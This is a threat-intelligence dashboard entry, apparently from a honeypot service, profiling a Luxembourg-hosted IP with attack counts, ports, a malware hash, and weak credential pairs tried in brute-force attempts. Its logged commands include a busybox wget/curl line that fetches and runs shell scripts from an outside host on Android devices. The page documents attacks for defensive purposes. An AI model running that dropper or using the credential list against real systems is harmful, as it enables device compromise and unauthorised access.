TROYANOSYVIRUS
Active ThreatHIGH

176.65.139.101

Country of Origin🇱🇺 LU
First Detection4/10/2026
Last Activity4/14/2026
ISPOffshore LC
🎯
3,031
Total Attacks
🔌
3
Ports
📡
3
Attack Types
🦠
1
Malware

Geolocation

Country
🇱🇺 LU
City
Unknown
ASN
AS214472
ISP
Offshore LC

Attack Types

ssh_telnet_honeypot
adb_honeypot
tcp_trap

Attacked Ports

22555560001

Associated Malware

7ab552f01de999cb1209...

Attempted Credentials

🔐aiuser/123456
1x
🔐kamran/kamran
1x
🔐root/Aa1234567890
1x
🔐elk/elk@123
1x
🔐developer/123456
1x
🔐root/4r3e2w1q
1x
🔐tidb/tidb
1x
🔐www/123456
1x
🔐cursor/cursor
1x
🔐test/test!@
1x
🔐root/Abc12345
1x
🔐xcy/123456
1x
🔐aiuser/aiuser
1x
🔐user10/user10
1x
🔐root/admin1234
1x

Executed Commands

$cd /data/local/tmp/; busybox wget http://43.228.157.130/w.sh; sh w.sh android.exploit; curl http://43.228.157.130/c.sh; sh c.sh android.exploit2x
$uname -s -v -n -r -m2x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
22
CPEs
cpe:/o:canonical:ubuntu_linuxcpe:/a:openbsd:openssh:8.9p1

Risk Assessment

67
/100
LowMediumHighCritical